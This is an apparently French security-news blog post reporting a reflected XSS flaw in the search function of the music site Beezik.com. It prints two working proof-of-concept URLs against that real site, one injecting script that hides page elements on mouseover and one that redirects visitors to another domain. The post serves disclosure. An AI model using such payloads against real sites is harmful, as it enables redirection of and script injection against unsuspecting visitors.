Publié par UnderNews Actu - Télécharger l'application Android

Beezik.com est un site web créé début juin 2009, qui permet de télécharger gratuitement de la musique de manière légale. Le site se finance via la mise en place de publicité vidéo visionnée à chaque titre téléchargé. Déjà plus de 2 millions de titres sont disponibles sur la plateforme.

Un internaute a découvert une faille de type XSS non persistante sur le site via son moteur de recherche et l’a fait savoir via Twitter.

Pour illustrer sa découverte, celui-ci a créé un PoC qui permet « d’effacer » le site au passage de la souris (mouseover). Plutôt marrant !

http://www.beezik.com/memberMusicAllResults.htm?keyword=music%22%3Cscript%3E$%28document%29.ready%28function%28%29{$%28%27a,h2,input,button,%23Accroche,.newListSelected%27%29.mouseover%28function%28%29{$%28this%29.fadeOut%28%29;}%29}%29;%3C/script%3E%3Crien%20a=%22&category=All


ExpressVPN

Bien entendu, cela reste une XSS, donc la prudence reste de mise même si le PoC est inoffensif.

EDIT : autre exemple d’exploitation http://www.beezik.com/memberMusicAllResults.htm?keyword=music%22″><script>document.location=’http://undernews.fr’;</script>

Cela a pour effet de rediriger un visiteur vers un site quelconque (UnderNews en l’occurrence dans cet exemple).

Vous avez aimé cet article ? Alors partagez-le en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin Pinterest email
1 étoile2 étoiles3 étoiles4 étoiles5 étoiles (2 votes, note : 4,00 sur 5)
Loading...

Mots clés : , , , , , ,


Vos réactions




Notifiez-moi des commentaires à venir via e-mail. Vous pouvez aussi vous abonner sans commenter.